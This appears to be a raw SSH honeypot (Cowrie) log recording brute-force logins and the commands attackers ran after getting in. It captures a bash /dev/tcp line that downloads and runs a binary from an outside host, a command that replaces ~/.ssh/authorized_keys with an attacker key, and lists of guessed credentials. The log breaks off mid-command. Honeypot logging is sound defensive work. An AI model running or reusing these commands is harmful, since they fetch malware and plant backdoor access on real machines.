{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:47:56.274098Z","src_ip":"170.64.157.139","session":"88ad84cffc3f"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty123","message":"login attempt [postgres/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:47:57.167735Z","src_ip":"170.64.157.139","session":"88ad84cffc3f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:47:58.466281Z","src_ip":"170.64.157.139","session":"88ad84cffc3f"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":33648,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c4658c7d80","protocol":"ssh","message":"New connection: 8.138.136.155:33648 (1.2.3.4:22) [session: 13c4658c7d80]","sensor":"my-vps","timestamp":"2025-09-08T18:48:38.208617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T18:48:38.209686Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T18:48:38.210288Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T18:48:38.913957Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:48:40.135333Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:48:40.618554Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T18:48:40.621347Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/n7I4a8cYdV && chmod +x /tmp/n7I4a8cYdV && /tmp/n7I4a8cYdV lQD8f0YuTnn5DungEON/STpJffwQ7/gR+3VRMU504xHv6w75dUU2T3z5EvjgDv98SC5NeP0O4Ooa+31ONEdt9Q7p6xjjfEw2UXz4FeLuEPx8Tk7cul81m0oSd/yWu7A=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/n7I4a8cYdV && chmod +x /tmp/n7I4a8cYdV && /tmp/n7I4a8cYdV lQD8f0YuTnn5DungEON/STpJffwQ7/gR+3VRMU504xHv6w75dUU2T3z5EvjgDv98SC5NeP0O4Ooa+31ONEdt9Q7p6xjjfEw2UXz4FeLuEPx8Tk7cul81m0oSd/yWu7A=\" &","sensor":"my-vps","timestamp":"2025-09-08T18:48:46.851319Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/mlAQYGysNY","message":"CMD: head -c 1458464 > /tmp/mlAQYGysNY","sensor":"my-vps","timestamp":"2025-09-08T18:48:46.855195Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T18:48:47.086021Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T18:48:47.091294Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T18:48:47.095028Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d85ce4495a52fe6b96fc1ffae0543d7284ba35892607aa3afa557d1d70a24dfd","size":1940,"shasum":"d85ce4495a52fe6b96fc1ffae0543d7284ba35892607aa3afa557d1d70a24dfd","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/d85ce4495a52fe6b96fc1ffae0543d7284ba35892607aa3afa557d1d70a24dfd after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:48:47.096357Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:48:47.097960Z","src_ip":"8.138.136.155","session":"13c4658c7d80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34002,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2ea54b68bf2","protocol":"ssh","message":"New connection: 212.227.235.229:34002 (1.2.3.4:22) [session: e2ea54b68bf2]","sensor":"my-vps","timestamp":"2025-09-08T18:48:56.052408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:48:56.053153Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:48:56.385451Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.login.success","username":"root","password":"babylon5","message":"login attempt [root/babylon5] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:48:57.803356Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:48:58.536339Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:48:58.537090Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:48:58.538424Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:48:58.872787Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:48:59.555471Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:48:59.556246Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:48:59.895937Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:48:59.896912Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40524,"dst_ip":"1.2.3.4","dst_port":22,"session":"033d5e44c163","protocol":"ssh","message":"New connection: 212.227.235.229:40524 (1.2.3.4:22) [session: 033d5e44c163]","sensor":"my-vps","timestamp":"2025-09-08T18:49:00.214248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:00.215148Z","src_ip":"212.227.235.229","session":"033d5e44c163"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:00.534034Z","src_ip":"212.227.235.229","session":"033d5e44c163"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:49:01.852542Z","src_ip":"212.227.235.229","session":"033d5e44c163"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:03.174571Z","src_ip":"212.227.235.229","session":"033d5e44c163"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40538,"dst_ip":"1.2.3.4","dst_port":22,"session":"df2e4416bc40","protocol":"ssh","message":"New connection: 212.227.235.229:40538 (1.2.3.4:22) [session: df2e4416bc40]","sensor":"my-vps","timestamp":"2025-09-08T18:49:03.491811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:03.493294Z","src_ip":"212.227.235.229","session":"df2e4416bc40"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:03.812721Z","src_ip":"212.227.235.229","session":"df2e4416bc40"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:49:05.146748Z","src_ip":"212.227.235.229","session":"df2e4416bc40"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:05.471192Z","src_ip":"212.227.235.229","session":"df2e4416bc40"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:05.472127Z","src_ip":"212.227.235.229","session":"e2ea54b68bf2"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":35182,"dst_ip":"1.2.3.4","dst_port":22,"session":"31c1aeda02d3","protocol":"ssh","message":"New connection: 170.64.157.139:35182 (1.2.3.4:22) [session: 31c1aeda02d3]","sensor":"my-vps","timestamp":"2025-09-08T18:49:10.454418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:49:10.455232Z","src_ip":"170.64.157.139","session":"31c1aeda02d3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:49:10.743905Z","src_ip":"170.64.157.139","session":"31c1aeda02d3"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123321","message":"login attempt [postgres/123321] failed","sensor":"my-vps","timestamp":"2025-09-08T18:49:11.906923Z","src_ip":"170.64.157.139","session":"31c1aeda02d3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:13.198820Z","src_ip":"170.64.157.139","session":"31c1aeda02d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56348,"dst_ip":"1.2.3.4","dst_port":22,"session":"c07830ca3927","protocol":"ssh","message":"New connection: 212.227.235.229:56348 (1.2.3.4:22) [session: c07830ca3927]","sensor":"my-vps","timestamp":"2025-09-08T18:49:19.577508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:49:19.579198Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:49:19.882969Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.login.success","username":"root","password":"pass@2025","message":"login attempt [root/pass@2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:49:21.141644Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:49:21.807183Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:49:21.807891Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:49:21.808665Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:49:22.114166Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:49:22.773111Z","src_ip":"212.227.235.229","session":"c07830ca3927"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 